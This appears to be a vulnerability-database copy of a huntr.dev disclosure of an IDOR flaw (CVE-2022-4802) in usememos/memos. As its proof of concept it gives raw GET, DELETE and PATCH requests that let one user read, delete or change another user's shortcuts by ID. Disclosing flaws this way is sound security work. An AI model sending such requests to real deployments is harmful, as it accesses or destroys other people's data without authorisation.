Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrLeoracD47D4A94-92E3-4400-B012-A8577CBD7956
HistoryDec 26, 2022 - 8:45 a.m.

IDOR allows to see, update and delete other users shortcuts

2022-12-2608:45:20
leorac
www.huntr.dev
12
idor
information security
api vulnerability
access control

EPSS

0.001

Percentile

21.8%

JSON

Description

Even if the endpoint /api/shortcut allow to see the list of your own shortcuts, it is possible to access, modify and delete other users shortcut accessing directly through the IDs.

Proof of Concept

  • Login with one user, and create a shortcut, let’s consider it now has the ID 1
  • Login with another user

Now you are able to access to the shortcut with this:

GET /api/shortcut/1 HTTP/1.1
Host: localhost:5230

You can also delete it:

DELETE /api/shortcut/1 HTTP/1.1
Host: localhost:5230

And update it

PATCH /api/shortcut/1 HTTP/1.1
Host: localhost:5230

{"id":1,"title":"changed 2","payload":"[]"}

Related

osv 3
veracode 1
cvelist 1
cve 1
github 1
prion 1
nvd 1
osv
osv
CVE-2022-4802
2022-12-28 14:15:10
usememos/memos vulnerable to Improper Authorization
2022-12-28 15:30:45
usememos/memos vulnerable to Improper Authorization in github.com/usememos/memos
2024-08-21 16:04:01
veracode
veracode
Improper Authorization
2023-01-02 10:53:26
cvelist
cvelist
CVE-2022-4802 Authorization Bypass Through User-Controlled Key in usememos/memos
2022-12-28 00:00:00
cve
cve
CVE-2022-4802
2022-12-28 14:15:10
github
github
usememos/memos vulnerable to Improper Authorization
2022-12-28 15:30:45
prion
prion
Authorization
2022-12-28 14:15:00
nvd
nvd
CVE-2022-4802
2022-12-28 14:15:10

EPSS

0.001

Percentile

21.8%

JSON
Related for D47D4A94-92E3-4400-B012-A8577CBD7956
osv3veracode1cvelist1cve1github1prion1nvd1